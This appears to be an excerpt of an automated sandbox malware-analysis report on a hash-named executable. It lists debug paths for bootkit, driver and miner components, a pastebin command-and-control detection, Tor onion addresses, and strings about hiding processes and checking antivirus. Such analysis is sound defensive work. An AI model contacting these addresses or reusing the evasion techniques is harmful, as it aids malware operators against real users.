                        Source: Binary string: EfiGuardDxe.pdb7 source: 288c47bbc1871b439df19ff4df68f076.exe
                        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: symsrv.pdb source: 288c47bbc1871b439df19ff4df68f076.exe
                        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vueqjgslwynd.exe, 0000001B.00000003.1474933632.000001EBD15A0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: Unable to locate the .pdb file in this location source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: The module signature does not match with .pdb signature. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: .pdb.dbg source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: '(EfiGuardDxe.pdbx source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: symsrv.pdbGCTL source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003ED8000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000035E9000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000C7A000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: C:\xericuzakiziy64\dayolev xadesowip kijo.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000000.1358564663.0000000000807000.00000002.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000000.1462221086.0000000000807000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: or you do not have access permission to the .pdb location. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: EfiGuardDxe.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: dbghelp.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: Binary string: dbghelp.pdbGCTL source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003D2B000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.000000000343C000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000002.1591528645.000000000346C000.00000040.00001000.00020000.00000000.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C63
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_004068B4 FindFirstFileW,FindClose,3_2_004068B4
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeCode function: 3_2_00402910 FindFirstFileW,3_2_00402910

                        Networking

                        barindex
                        Connects to a pastebin service (likely for C&C)
                        Source: unknownDNS query: name: pastebin.com
                        Found Tor onion address
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
                        Source: 288c47bbc1871b439df19ff4df68f076.exeString found in binary or memory: nvalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackint
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C194000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: .P19152c2014093e313d075d110f3d082e50http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionhttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7FirstInstallDateS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7SELECT Name FROM Win32_ProcessorIntel(R) Core(TM)2 CPU 6600 @ 2.40 GHzS-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7c:\users\user\appdata\local\temp\288c47bbc1871b439df19ff4df68f076.exe"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" C:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.comC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.exeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.batC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.cmdC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.vbeC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jsC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.jseC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wsfC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.wshC:\Program Files (x86)\Common Files\Oracle\Java\javapath\powershell.msc
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: HKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003\Software\Microsoft\a839a7d7https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionSELECT displayName FROM AntiVirusProductEastern Standard Time
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C1E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1486193490.000000000C184000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: b001d03091c1310114b0c1a02HKEY_USERS\S-1-5-21-2246122658-3693405117-2476756634-1003advapi32.dlla839a7d71a2dee1828e0f2b62022350439b4f41ccabc2a7c6affe16e329df454a839a7d71a2dee1828e0f2b62022350439b4f41ccabc2a7c6affe16e329df454advapi32.dllServiceVersionServiceVersionServersVersionServersVersionDistributorIDConnectServerWindows DefenderConnectServer.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.mscpowershell.compowershell.exepowershell.batpowershell.cmdpowershell.vbspowershell.vbepowershell.jspowershell.jsepowershell.wsfpowershell.wshpowershell.mscC:\Program Files (x86)\Common Files\Oracle\Java\javapath\user-PCWbemScripting.SWbemLocatorhttps://statsexplorer.orghttp://3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onionWbemScripting.SWbemLocatorWbemScripting.SWbemLocatorcurrent filenname with args "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.0000000002D70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Nyiakeng_Puachue_HmongPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSao Tome Standard TimeSeImpersonatePrivilegeSetupDiEnumDriverInfoWSetupDiGetClassDevsExWTasmania Standard TimeTor bootstrap progressTor service is runningUnsupported Media TypeWSAGetOverlappedResultWSALookupServiceBeginWWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8access-control-max-ageaddress already in useadvapi32.dll not foundargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryclient not initializedcompileCallabck: type couldn't create devicecouldn't get file infocouldn't start servicecoulnd't write to filecreate main window: %wdecode and decrypt: %wdriver: bad connectionduplicated defer entryelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionencrypt and encode: %werror decoding messageerror parsing regexp: failed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to register: %wfailed to set UUID: %wframe_data_pad_too_bigfreeIndex is not validgenerate challenge: %wgetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shide process ID %d: %whpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/https://duniadekho.baridna: invalid label %qinappropriate fallbackinteger divide by zerointegrity check failedinterface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple 